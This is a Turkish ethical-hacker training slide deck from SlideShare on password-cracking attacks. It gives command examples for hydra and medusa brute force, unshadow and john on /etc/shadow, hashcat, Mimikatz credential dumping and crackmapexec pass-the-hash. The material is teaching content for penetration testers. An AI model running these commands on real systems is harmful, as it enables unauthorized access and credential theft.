SlideShare a Scribd company logo
1 of 34
www.prismacsi.com
© All Rights Reserved.
1
Uygulamalı Beyaz Şapkalı Hacker Eğitimi #8
Parola Kırma Saldırıları
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye
https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
www.prismacsi.com
© All Rights Reserved.
2
Konular
• Parola ve Şifre Kavramları
• Hash ve Salt Kavramları
• Parola Kırma Saldırılarında Püf Noktalar
• Saldırı Türleri
• Wordlist Oluşturma
• Kullanılan Araçlar
www.prismacsi.com
© All Rights Reserved.
3
Parola ve Şifre Kavramları
• Parola: Açık metin, gizli tutulması gereken karakter dizisidir. Kullanıcı kendi belirler ve parolayı kullanarak
belirli alanlara giriş sağlar.
• Şifre: Parolanın bir algoritma aracılığı ile yeni bir formata dönüştürülmüş halidir.
www.prismacsi.com
© All Rights Reserved.
4
Hash ve Salt Kavramları
• Hash: Bir verinin sabit sayıda bir özete çevrilmiş halidir. Özetten geri açık metin hale döndürme algoritması
yoktur ve doğrulama amacıyla kullanılır. Örn: MD5
• Salt: Veriler hash algoritmalarından geçirilirken Rainbow Table saldırıları aracılığıyla kolayca kırılamasın diye
verinin sonuna, başına veya ortasında bir yere yerleştirilen karakter dizisidir.
• Prisma -> hash -> 112312311231
• Prisma -> salt(sona +++) -> Prisma+++ -> 1823891239812
www.prismacsi.com
© All Rights Reserved.
5
Parola Kırma Saldırılarında Püf Noktalar
• Saldırıların temelinde her zaman istihbarat vardır.
• Yapacağını bir parola kırma saldırısı için öncesinde kurum veya şahısa karşı bir istihbarat çalışması
yapıldıysa ve burada internete sızdırılmış bir parola yakalandıysa bu kesinlikle wordlistlere eklenmelidir.
• En doğru saldırı, istihbarat eşliğinde gerçekleşecek!
• Baştan sona tüm adımları doğru atmak bu yüzden önemli. Sızıntı kaynaklarını kontrol etmek gerek.
• Paste siteleri
• Haveibeenpwned vs.
www.prismacsi.com
© All Rights Reserved.
6
Parola Kırma Saldırılarında Püf Noktalar
• Parola tahmini için brute force (kaba kuvvet) saldırıları gerçekleştirilebilir. Bu saldırıların dezavantajları
şöyledir:
• Yapılan saldırı sonucu kullanıcıların hesapları kilitlenebilir. Bknz: Lockout Policy
• Bu yapılan saldırı sonrası ağ cihazlarında veya SIEM üzerinde çok fazla alarm üretilebilir. Bu durum
işimize gelmeyecektir.
• Bir sisteme sızıldığında oradan parola özetleri (hash) elde edilebilir. Bu durumda Hash Crack saldırısı
gerçekleştirmek gerekir.
• Genelde localde ve sessiz, sakin bir süreç ile tamamlanır.
• Elde edilen hash bilgileri kırıldığında siber saldırı evrimleşir.
www.prismacsi.com
© All Rights Reserved.
7
Parola Kırma Saldırılarında Püf Noktalar
• Bir sisteme sızıldığında ve elde edilen hashler kırıldığında siber saldırı evrimleşir dedik. Neden?
• Kurum içi parola politikaları genelde yeterince sıkılaştırılmış olmuyor.
• Bu kırılan parola ile bir Password Spraying Attack gerçekleştirildiğinde birçok sistemin
parolasının aynı olduğu görülebilir.
• Böylece elde edilen bir parola aracılığı ile birden fazla sisteme sızılabilir.
• Domain exploitation konusunu hatırlayın J Belki de domain admine giden yolu elde
etmenize olanak sağlayacaktır.
www.prismacsi.com
© All Rights Reserved.
8
Saldırı Türleri
• Aktif Saldırılar:
• Brute Force (Kava Kuvvet) Saldırıları
• Password Spraying Saldırıları
• Pasif Saldırılar:
• Hash Crack Saldırıları
• Rainbow Table Saldırıları
www.prismacsi.com
© All Rights Reserved.
9
Wordlist Oluşturma
• Bir parola kırma saldırısı içerisinde random oluşturulacak parola kombinasyonları yerine tespit
edilen bir formata göre kendinize wordlist oluşturabilirsiniz.
• Bu formatı nasıl tespit edebilirsiniz?
• Siber istihbarat J
• Aynı kurum veya şirketten birden fazla kişinin parolası internete sızmış mı?
• Sızdıysa aralarında bir benzerlik var mı?
• Ankara8817!
• Ankara7625!
www.prismacsi.com
© All Rights Reserved.
10
Wordlist Oluşturma
• Wordlist oluşturulurken genelde crunch aracını kullanıyoruz.
• Oldukça kullanışlı ve esnek, dolayısıyla istediğiniz kombinasyonları üretmenize olanak sağlıyor.
• Basit kullanım:
• crunch 6 7 abc123
• 6 ve7 karakterden oluşan ve içeriğinde abc123 karakterlerini barındıran bir wordlist
• crunch 6 8 1234567890 -o numericwordlist.lst
• 6 ve 8 karakterden oluşan ve içeriğinde tüm rakamları barındıran bir wordlist
www.prismacsi.com
© All Rights Reserved.
11
Wordlist Oluşturma
• Peki ya biraz önce keşfettiğimiz Ankara’lı formata göre bir parola listesi oluşturmak istesek?
• Ankara0000!
• Ankara0001!
• Ankara0002!
• İşte bu noktada crunchın güzel parametrelerinden faydalanabilirsiniz.
• crunch 11 11 1234567890 –t Ankara@@@@! –o wordlist –z
• -z parametresi ziplemek amacıyla kullanılır
www.prismacsi.com
© All Rights Reserved.
12
Wordlist Oluşturma
• Karakter setleri ile de bir wordlist oluşturabilirsiniz.
• Karakter listeleri şurada:
• /usr/share/rainbowcrack/charset.txt
• crunch 7 7 -f /usr/share/rainbowcrack/charset.txt mixalpha -o liste -z
www.prismacsi.com
© All Rights Reserved.
13
Crunch - Uygulama
www.prismacsi.com
© All Rights Reserved.
14
Crunch - Uygulama
www.prismacsi.com
© All Rights Reserved.
15
CUPP - Uygulama
• CUPP isim, soy isim, nickname, doğum tarihi gibi parametreleri alarak wordlist oluşturmaktadır.
www.prismacsi.com
© All Rights Reserved.
16
Hydra
• Tespit edilen servislere bruteforce saldırıları ypaılmak istendiğinde hydra oldukça kullanışlıdır.
• Aracı komut satırı üstünden veya var olan GUI’si (xHydra) aracılığı ile kullanabilirsiniz.
• Bir veya birden fazla kullanıcıya veya hedefe parola kırma saldırısı gerçekleştirebilirsiniz.
www.prismacsi.com
© All Rights Reserved.
17
Hydra - Uygulama
• Örnek kullanımlar:
• hydra -l user -P passlist.txt ftp://192.168.0.1
• hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
• hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
• hydra -l admin -p password ftp://[192.168.0.0/24]/
• hydra -L logins.txt -P pws.txt -M targets.txt ssh
www.prismacsi.com
© All Rights Reserved.
18
xHydra - Uygulama
• xHydra, Hydra’nın grafik arayüzlü halidir.
www.prismacsi.com
© All Rights Reserved.
19
Medusa
• Komut satırı üzerinden kullanılan ve bizim en sık kullandıklarımız arasında yer alan bir parola kırma
saldırısı aracıdır.
• Yine hydra nın özelikleri içerisinde de bulunduğu gibi birden fazla hedefe saldırı yapılabilir ve wordlistler
aracılığıyla birçok protokole parola kırma saldırısı gerçekleştirilebilir.
www.prismacsi.com
© All Rights Reserved.
20
Medusa - Uygulama
• medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M http
• medusa -h 10.0.1.5 –U userlistesi.txt –p “secretpass” -M smbnt
• medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M ftp
• medusa -h 10.0.1.5 -u ”root" -P parolalistesi.txt -M telnet
• Medusa aşağıdaki tüm servisleri desteklemektedir.
• AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3,
PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2,
Subversion (SVN), Telnet, VNC
www.prismacsi.com
© All Rights Reserved.
21
Metasploit
• Metasploit içerisinde parola kırma saldırılarına imkan sunan auxiliary modülleri barındırmaktadır.
• Örnek olarak smb ye bruteforce saldırısı yapılmak istendiğinde aşağıdaki modül kullanılabilir.
• use auxiliary/scanner/smb/smb_login
www.prismacsi.com
© All Rights Reserved.
22
Sparta
• Sparta basit seviyede zafiyet tarama aracı olmasıyla birlikte arayüz üzerinden bruteforce parola
kırma saldırılarına izin veren kullanışlı bir toldur.
www.prismacsi.com
© All Rights Reserved.
23
Patator
• Kali’de default olarak kurulu olarak gelmez.
• https://github.com/lanjelot/patator
• Komut satırından çalışmaktadır ve oldukça basit bir kullanımı vardır.
www.prismacsi.com
© All Rights Reserved.
24
Burp Suite
• Web uygulamalarına Burp Suite Intruder kullanılarak bruteforce saldırısı gerçekleştirilebilir.
• Uygulama
www.prismacsi.com
© All Rights Reserved.
25
Hash Kırma Saldırıları
• Hash-Buster
• https://github.com/s0md3v/Hash-Buster
• Online birçok adresten otomatize hash kontrolü
• buster –s <hash>
• buster –f /root/hash.txt
• buster –d /root/Desktop
www.prismacsi.com
© All Rights Reserved.
26
Hash Kırma Saldırıları
• John-the-ripper
• Offline (Çevrimdışı) hash kırma aracı olarak tanımlanır.
• Oldukça kullanışlı ve pratiktir.
• Bir linux makineye sızdınız ve hashleri alacaksınız.
• unshadow /etc/passwd /etc/shadow > hashlist
• john --wordlist /usr/share/wordlists/rockyou.txt hashlist
• cat /root/.john/john.pot
www.prismacsi.com
© All Rights Reserved.
27
Hash Kırma Saldırıları
• John-the-ripper birçok formatı desteklemektedir.
• john --list=formats : formatları görüntüleyebilirsiniz.
• john --format=LM hashfile
• john --format=oracle hashfile
www.prismacsi.com
© All Rights Reserved.
28
Hash Kırma Saldırıları
• Hashcat yine komut satırı üstünden yönetebileceğiniz ve size gpu cracking dahil birçok fonksiyon
sunan gelişmiş bir parola kırma aracıdır.
• Birçok parametresi mevcut bu yüzden kullanırken manuali okumakta fayda var.
• hashcat -h
• Örneğin bir md5 ile hashlenmiş parolayı kırmak istediğinizde:
• hashcat -m 0 -a 0 -o passlist hashlist /usr/share/wordlists/rockyou.txt
• -m 0 : md5 algoritmasını işaretlemekte
• -a 0 : sözlük saldırısı yapmayı işaretlemekte
www.prismacsi.com
© All Rights Reserved.
29
Rainbow Table Atakları
• Bruteforce ataklar zaman alıyor.
• Daha önceden elimizde hashlenmiş bir wordlist varsa?
• parola - hash karşılığı
• parola2 - hash karşılığı
• parola3 - hash karşılığı
• Saniyeler içerisinde çözümlenebilir.
• www.cmd5.org
www.prismacsi.com
© All Rights Reserved.
30
Hafızadan Parola Elde Etme
• Mimikatz ile hafızadan açık metin parola yakalayabilirsiniz.
• Bunun için sistemde yetkili bir session elde etmek gerekiyor.
• Mimikatz binaryleri ile veya crackmapexec ile bu işi çözebilirsiniz.
• https://github.com/gentilkiwi/mimikatz
• mimikatz.exe
• privilege::debug
• sekurlsa::logonPasswords full
• crackmapexec smb 10.0.1.5 -u Administrator -p ’Passwd123!' -M mimikatz
www.prismacsi.com
© All Rights Reserved.
31
Pass the Hash Saldırıları
• Crackmapexec ile gösterimini yapmıştık.
• Windows makineden hashdump ile alınan hashleri bir başka suncuya giriş için kullanabilirsiniz.
• Hash kırmanıza gerek yok, direk hash i parola olarak kullanabiliyorsunuz.
• Metasploit üzerindeki smb_login ile giriş denemesi yapabilir, psexec exploiti ile makineye
sızabilirsiniz.
• Crackmapexec :
• crackmapexec smb 10.0.1.5 -u username -H NTHASH
www.prismacsi.com
© All Rights Reserved.
32
Uygulamalar
www.prismacsi.com
© All Rights Reserved.
33
Sorular?
www.prismacsi.com
© All Rights Reserved.
34
www.prismacsi.com
info@prismacsi.com
0 850 303 85 35
/prismacsi
İletişim

More Related Content

What's hot

Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiSparta Bilişim
 
Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13Murat KARA
 
Extended Detection and Response (XDR) An Overhyped Product Category With Ulti...
Extended Detection and Response (XDR)An Overhyped Product Category With Ulti...Extended Detection and Response (XDR)An Overhyped Product Category With Ulti...
Extended Detection and Response (XDR) An Overhyped Product Category With Ulti...Raffael Marty
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoastken_kitahara
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITYSupanShah2
 
Siber Güvenlik ve Etik Hacking Sunu - 12
Siber Güvenlik ve Etik Hacking Sunu - 12Siber Güvenlik ve Etik Hacking Sunu - 12
Siber Güvenlik ve Etik Hacking Sunu - 12Murat KARA
 
Vectra Concept Overview
Vectra Concept OverviewVectra Concept Overview
Vectra Concept OverviewIlya O
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Murat KARA
 
Cyber Security (Emerging Threats)
Cyber Security (Emerging Threats)Cyber Security (Emerging Threats)
Cyber Security (Emerging Threats)Kaufman & Canoles
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakBGA Cyber Security
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri BGA Cyber Security
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiKurtuluş Karasu
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2BGA Cyber Security
 
Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriEPICROUTERS
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ BGA Cyber Security
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Murat KARA
 
DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"BGA Cyber Security
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 

What's hot (20)

Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı Tespiti
 
Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13Siber Güvenlik ve Etik Hacking Sunu - 13
Siber Güvenlik ve Etik Hacking Sunu - 13
 
Extended Detection and Response (XDR) An Overhyped Product Category With Ulti...
Extended Detection and Response (XDR)An Overhyped Product Category With Ulti...Extended Detection and Response (XDR)An Overhyped Product Category With Ulti...
Extended Detection and Response (XDR) An Overhyped Product Category With Ulti...
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli Analiz
 
In the Wake of Kerberoast
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
 
Secure password - CYBER SECURITY
Secure password - CYBER SECURITYSecure password - CYBER SECURITY
Secure password - CYBER SECURITY
 
Siber Güvenlik ve Etik Hacking Sunu - 12
Siber Güvenlik ve Etik Hacking Sunu - 12Siber Güvenlik ve Etik Hacking Sunu - 12
Siber Güvenlik ve Etik Hacking Sunu - 12
 
Vectra Concept Overview
Vectra Concept OverviewVectra Concept Overview
Vectra Concept Overview
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5
 
Cyber Security (Emerging Threats)
Cyber Security (Emerging Threats)Cyber Security (Emerging Threats)
Cyber Security (Emerging Threats)
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
 
Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9
 
DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları

Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit AşamasıPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiBeyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiPRISMA CSI
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber Security
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...CypSec - Siber Güvenlik Konferansı
 
YARA KURALLARI
YARA KURALLARIYARA KURALLARI
YARA KURALLARIFerdi Gul
 
Microsoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif SaldirilarMicrosoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif SaldirilarAdeo Security
 
Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018Murat KARA
 
Web Uygulama Güvenliği
Web Uygulama GüvenliğiWeb Uygulama Güvenliği
Web Uygulama GüvenliğiMesut Güngör
 
Security Misconfiguration (Güvenlik Yalnış Yapılandırma)
Security Misconfiguration (Güvenlik Yalnış Yapılandırma)Security Misconfiguration (Güvenlik Yalnış Yapılandırma)
Security Misconfiguration (Güvenlik Yalnış Yapılandırma)Abdullah Celik
 
Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)Cihan Özhan
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİTulay Candar
 
Yeni Başlayanlar için RSA Şifreleme Algoritması
Yeni Başlayanlar için RSA Şifreleme AlgoritmasıYeni Başlayanlar için RSA Şifreleme Algoritması
Yeni Başlayanlar için RSA Şifreleme AlgoritmasıAssylzhanDukenbay1
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBGA Cyber Security
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux Burak Oğuz
 
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriWeb Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriEPICROUTERS
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları (20)

Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
 
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiBeyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
 
YARA KURALLARI
YARA KURALLARIYARA KURALLARI
YARA KURALLARI
 
Microsoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif SaldirilarMicrosoft Active Directory'deki En Aktif Saldirilar
Microsoft Active Directory'deki En Aktif Saldirilar
 
Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018Python Programlama Diline Giriş - Güncelleme 2018
Python Programlama Diline Giriş - Güncelleme 2018
 
Web Uygulama Güvenliği
Web Uygulama GüvenliğiWeb Uygulama Güvenliği
Web Uygulama Güvenliği
 
Sosyal Medya ve Güvenlik
Sosyal Medya ve GüvenlikSosyal Medya ve Güvenlik
Sosyal Medya ve Güvenlik
 
Security Misconfiguration (Güvenlik Yalnış Yapılandırma)
Security Misconfiguration (Güvenlik Yalnış Yapılandırma)Security Misconfiguration (Güvenlik Yalnış Yapılandırma)
Security Misconfiguration (Güvenlik Yalnış Yapılandırma)
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)Blockchain : Decentralized Application Development (Turkish)
Blockchain : Decentralized Application Development (Turkish)
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
 
Yeni Başlayanlar için RSA Şifreleme Algoritması
Yeni Başlayanlar için RSA Şifreleme AlgoritmasıYeni Başlayanlar için RSA Şifreleme Algoritması
Yeni Başlayanlar için RSA Şifreleme Algoritması
 
.Net ile yazılım güvenliği
.Net ile yazılım güvenliği.Net ile yazılım güvenliği
.Net ile yazılım güvenliği
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
 
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking YontemleriWeb Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri
 

More from PRISMA CSI

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log ToplamaPRISMA CSI
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPRISMA CSI
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPRISMA CSI
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi MetodolojileriPRISMA CSI
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?PRISMA CSI
 

More from PRISMA CSI (9)

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log Toplama
 
Practical White Hat Hacker Training - Post Exploitation
